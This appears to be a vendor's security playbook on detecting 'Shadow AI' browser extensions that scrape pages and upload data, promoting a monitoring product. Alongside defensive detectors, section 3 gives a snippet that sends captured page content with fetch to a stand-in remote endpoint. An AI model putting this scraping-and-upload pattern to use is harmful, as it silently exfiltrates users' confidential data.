How to identify, monitor, and contain unauthorized AI tools before they exfiltrate data

Shadow AI is one of the fastest-growing security risks inside modern organizations, and arguably a more dangerous one than Shadow IT ever was.

Why? Because AI tools don’t just access systems.

They access data, content, tokens, credentials, dashboards, emails, and internal pages directly from the user’s browser.

This playbook explains how Shadow AI emerges, how to detect it early using runtime signals, and how BreachFin provides the continuous visibility required to control the risk before it spreads.

1. What Exactly Is Shadow AI?

Shadow AI refers to:

- Unapproved AI tools

- AI-powered browser extensions

- AI assistants with broad permissions

- AI “side panels” in browsers

- SaaS AI copilots connected through OAuth

- AI productivity tools with scraping ability

These tools:

- Collect screen content

- Intercept network calls

- Read DOM and inputs

- Access tokens in memory

- Auto-upload data to external LLM servers

They bypass traditional security controls and behave like unmonitored insiders.

2. Why Shadow AI Is Exploding

Shadow AI adoption is driven by:

- Employee desire for productivity

- AI chat tools being embedded in browsers

- Auto-scraping and summarization features

- Freemium AI plugins requiring OAuth access

- Lack of clear corporate guidelines

Shadow AI grows faster than IT security can respond.



3. How Shadow AI Actually Works Under the Hood

Shadow AI tools typically:

- Launch background scripts

- Inject content scripts into every webpage

- Capture page text and UI content

- Observe interactions and keystrokes

- Read responses from protected APIs

- Forward data to cloud AI inference endpoints

Examples of silent behavior:

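```javascript
// Fires on every tab navigation or reload
chrome.tabs.onUpdated.addListener(...)
// Runs extension code inside the current page
chrome.scripting.executeScript(...)
// Ships the captured content to a remote inference endpoint
fetch("https://ai-api.com/analyze", { method: "POST", body: payload })
```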

This happens continuously, without user awareness.

4. Shadow AI Attack Path (Step-by-Step)

Step 1 — User Installs AI Tool or Approves OAuth App

Often unintentionally, or because it promises convenience.

Step 2 — AI Tool Requests Broad Browser Permissions

These include:

- `activeTab`

- `tabs`

- `webRequest`

- `storage`

- `<all_urls>`

- clipboard access

User clicks “Allow”.
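A quick way to triage an extension before it is allowed is to score the permissions in its manifest. The sketch below assumes a Manifest V3 style object. The weights and the `scoreManifest` name are hypothetical and only illustrate the idea; they are not part of any product.

```javascript
// Hypothetical risk weights; tune these to your own policy.
const RISKY_PERMISSIONS = new Map([
  ["<all_urls>", 3],
  ["webRequest", 3],
  ["tabs", 2],
  ["clipboardRead", 2],
  ["activeTab", 1],
  ["storage", 1],
]);

// Collects the risky entries requested by a manifest and sums their weights.
function scoreManifest(manifest) {
  const requested = [
    ...(manifest.permissions ?? []),
    ...(manifest.host_permissions ?? []),
    ...(manifest.optional_permissions ?? []),
  ];
  const findings = requested.filter((p) => RISKY_PERMISSIONS.has(p));
  const score = findings.reduce((sum, p) => sum + RISKY_PERMISSIONS.get(p), 0);
  return { findings, score };
}

// Example manifest for an imaginary AI sidebar extension.
const exampleManifest = {
  manifest_version: 3,
  name: "Hypothetical AI Sidebar",
  permissions: ["activeTab", "tabs", "storage", "clipboardRead"],
  host_permissions: ["<all_urls>"],
};
console.log(scoreManifest(exampleManifest));
```

A high score does not prove abuse. It only flags extensions that deserve a manual review before users click “Allow”.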

Step 3 — Tool Scrapes Sensitive Data Automatically

This includes:

- Internal dashboards

- Billing information

- PII/PCI/PHI

- Admin portals

- JWTs/session tokens

- API responses

- Email inbox content
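To estimate how exposed a page is, it can help to scan its visible text for the data types listed above. The following is a minimal sketch with deliberately simple, illustrative patterns. The function names are assumptions, and a real classifier would need far more care.

```javascript
// Illustrative patterns only.
const JWT_RE = /\beyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g;
const EMAIL_RE = /\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b/g;
// 13 to 19 digits, optionally separated by single spaces or hyphens.
const CARD_RE = /\b\d(?:[ -]?\d){12,18}\b/g;

// Luhn checksum, used to discard digit runs that cannot be card numbers.
function passesLuhn(digits) {
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = Number(digits[i]);
    if (double) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// Counts JWT-like strings, email addresses, and Luhn-valid card-like numbers.
function classifyText(text) {
  const jwt = (text.match(JWT_RE) ?? []).length;
  const email = (text.match(EMAIL_RE) ?? []).length;
  const card = (text.match(CARD_RE) ?? []).filter((m) =>
    passesLuhn(m.replace(/\D/g, ""))
  ).length;
  return { jwt, email, card };
}

// In a browser this could be fed with document.body.innerText.
console.log(classifyText("Contact ops@example.com about card 4111 1111 1111 1111"));
```

Any page where these counts are non-zero is a page whose content an AI tool with page access could also read.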

Step 4 — Tool Sends Data to External AI Servers

Traffic goes to:

- OpenAI

- Anthropic

- Google Gemini

- Microsoft Copilot endpoints

- Unknown model API vendors

The traffic is TLS-encrypted, so you cannot inspect its contents in transit.

Nothing is logged on your own servers.

Nothing appears suspicious.
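Even when the payload cannot be read, the destination often can be seen in proxy, DNS, or runtime telemetry. The sketch below checks a URL against a small, incomplete list of AI API hostnames. The list and the `isAiEndpoint` name are assumptions for illustration, so maintain your own list from vendor documentation.

```javascript
// Illustrative and incomplete; extend from vendor documentation.
const AI_API_HOSTS = [
  "api.openai.com",
  "api.anthropic.com",
  "generativelanguage.googleapis.com",
];

// True when the URL's hostname is one of the listed hosts or a subdomain of one.
function isAiEndpoint(url) {
  let host;
  try {
    host = new URL(url).hostname;
  } catch {
    return false; // not an absolute URL
  }
  return AI_API_HOSTS.some((h) => host === h || host.endsWith("." + h));
}

console.log(isAiEndpoint("https://api.openai.com/v1/chat/completions"));
console.log(isAiEndpoint("https://api.openai.com.evil.example/collect"));
```

Matching on the parsed hostname, rather than on a substring of the URL, avoids being fooled by lookalike domains such as the second example.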

Step 5 — Data Leak Is Invisible to Backend Monitoring

Because:

- The data leak happens entirely client-side

- Outbound AI API calls go straight from the browser to the AI vendor and never touch your domain

- Backend logs see only normal activity

- Session looks valid and MFA-authenticated

This creates compliance, privacy, and security risk.

5. What Shadow AI Looks Like in the Browser

Without monitoring, it is invisible.

With runtime visibility (BreachFin), it looks like:

✔ Unexpected DOM access patterns

AI assistants read entire pages at once.

✔ Script behavior drift

New scripts appear where they shouldn’t.

✔ Outbound traffic to AI domains

Regular beacons to generative language APIs.

✔ Interference with critical flows

AI overlays appear during authentication or payment.

✔ Keylogging-like behavior

Event listeners attached to sensitive inputs.

✔ Token extraction attempts

Scripts hooking fetch/XHR to capture authorization headers.

✔ Unauthorized clipboard usage

Attempts to read or write clipboard silently.
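As one example of such a signal, a page can check whether `fetch` still looks like the browser's built-in function. This is a minimal sketch, not a description of how BreachFin works, and the helper names are hypothetical. It only catches wrappers installed in the page's own JavaScript context, and wrappers built with `bind` or `Proxy` can still pass the check.

```javascript
// True when the function's source text is the engine's native placeholder.
function looksNative(fn) {
  if (typeof fn !== "function") return false;
  const source = Function.prototype.toString.call(fn);
  return /\{\s*\[native code\]\s*\}\s*$/.test(source);
}

// Returns the names on `target` that are functions but no longer look native.
function findHookedApis(target, names) {
  return names.filter(
    (name) => typeof target[name] === "function" && !looksNative(target[name])
  );
}

// Intended for a browser page. Skipped elsewhere, because a non-browser
// runtime's own fetch may not be a native function.
if (typeof window !== "undefined") {
  console.log(findHookedApis(window, ["fetch"]));
}
```

A non-empty result means something replaced the function after page load. That is worth investigating, although legitimate monitoring libraries also wrap `fetch`.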

6. Why Traditional Controls Completely Fail

| Control | Why It Fails |
|---|---|
| WAF | Does not see client-side scraping |
| MFA | The tool operates inside the user’s already-authenticated session |
| SIEM | Logs show nothing abnormal |
| CASB | Detects SaaS usage, not browser scraping |
| SAST/DAST | Analyzes code, not runtime behavior |
| Antivirus | The tools are not malware |
| CSP | Extensions bypass page-defined policies |

Shadow AI operates in the browser, outside the reach of these traditional defensive layers.

7. How BreachFin Detects Shadow AI Instantly

BreachFin monitors runtime activity in the browser environment, detecting:

1. Unauthorized DOM Harvesting

Large-scale DOM reads at unusual frequency.

2. Suspicious Event Listener Patterns

Indicators of keylogging or scraping.

3. Hidden Script Injection

Scripts appearing from unexpected origins.

4. AI API Exfiltration

Outbound calls to known AI inference endpoints.

5. Token Access Attempts

JS hooking or reading authentication data.

6. Behavior Drift

Page acting differently than established baseline.

7. Extension Interference Detection

Identifying execution context coming from browser extensions.

None of the traditional controls listed in the previous section provides this visibility.
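The “unusual frequency” idea behind the first signal can be illustrated with a sliding-window counter. This is a generic sketch, not BreachFin's actual detection logic. The `RateMonitor` class, the window size, and the threshold are all assumptions, and how individual DOM reads are observed is left outside the example.

```javascript
// Flags bursts: more than `threshold` events inside the last `windowMs` milliseconds.
class RateMonitor {
  constructor({ windowMs, threshold }) {
    this.windowMs = windowMs;
    this.threshold = threshold;
    this.timestamps = [];
  }

  // Records one event at time `now` (ms) and returns true when the number of
  // events still inside the window exceeds the threshold.
  record(now = Date.now()) {
    this.timestamps.push(now);
    const cutoff = now - this.windowMs;
    while (this.timestamps.length > 0 && this.timestamps[0] <= cutoff) {
      this.timestamps.shift();
    }
    return this.timestamps.length > this.threshold;
  }
}

// Hypothetical policy: more than 3 large reads within one second is a burst.
const domReads = new RateMonitor({ windowMs: 1000, threshold: 3 });
for (const t of [0, 100, 200, 300]) {
  console.log(t, domReads.record(t));
}
```

Passing the timestamp explicitly keeps the logic easy to test. In production the default `Date.now()` would be used.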

8. Continuous Monitoring

BreachFin provides ongoing runtime telemetry:

- Page-by-page drift

- AI-specific anomalies

- Alerting on tamper attempts
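Page-by-page drift can be pictured as a comparison between the script sources seen on a page today and a previously recorded baseline. The sketch below is an assumption about how such a comparison might look, with hypothetical function names and example URLs. It only covers scripts that appear as `<script>` elements with a `src`.

```javascript
// Reduces script URLs to "scheme://host" keys, resolving relative URLs
// against the page URL.
function sourceKeys(scriptUrls, pageUrl) {
  const keys = new Set();
  for (const src of scriptUrls) {
    try {
      const u = new URL(src, pageUrl);
      keys.add(`${u.protocol}//${u.host}`);
    } catch {
      // Skip values that cannot be parsed as URLs.
    }
  }
  return keys;
}

// Lists script sources that appeared or disappeared relative to the baseline.
function diffSources(baseline, current) {
  return {
    added: [...current].filter((k) => !baseline.has(k)).sort(),
    removed: [...baseline].filter((k) => !current.has(k)).sort(),
  };
}

const page = "https://app.example.com/dashboard";
const baseline = sourceKeys(["/static/app.js", "https://cdn.example.com/lib.js"], page);
const current = sourceKeys(
  ["/static/app.js", "https://cdn.example.com/lib.js", "chrome-extension://abcdefgh/inject.js"],
  page
);
console.log(diffSources(baseline, current));
```

In a browser, the current list could be gathered with `[...document.scripts].map((s) => s.src).filter(Boolean)`.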

9. Why This Matters for Compliance

Shadow AI can put an organization out of compliance with:

- PCI DSS v4.0 Requirement 11.6.1 (change and tamper detection for payment pages)

- GDPR data minimization and transfer rules

- HIPAA ePHI access controls

- SOC 2 confidentiality principles

- Internal security and privacy policies

Auditors now ask:

“How do you ensure no unauthorized AI tools scrape sensitive data?”

Without runtime monitoring, you can’t answer that.

Final Takeaway

Shadow AI is not malware.

It is trusted software behaving in unsafe ways.

This makes it:

- Hard to detect

- Hard to block

- Hard to attribute

- Easy to exploit

If you cannot see what data AI tools are scraping from your browser, you have no control over what leaves your organization.

BreachFin closes this blind spot with continuous runtime monitoring and actionable, early detection signals.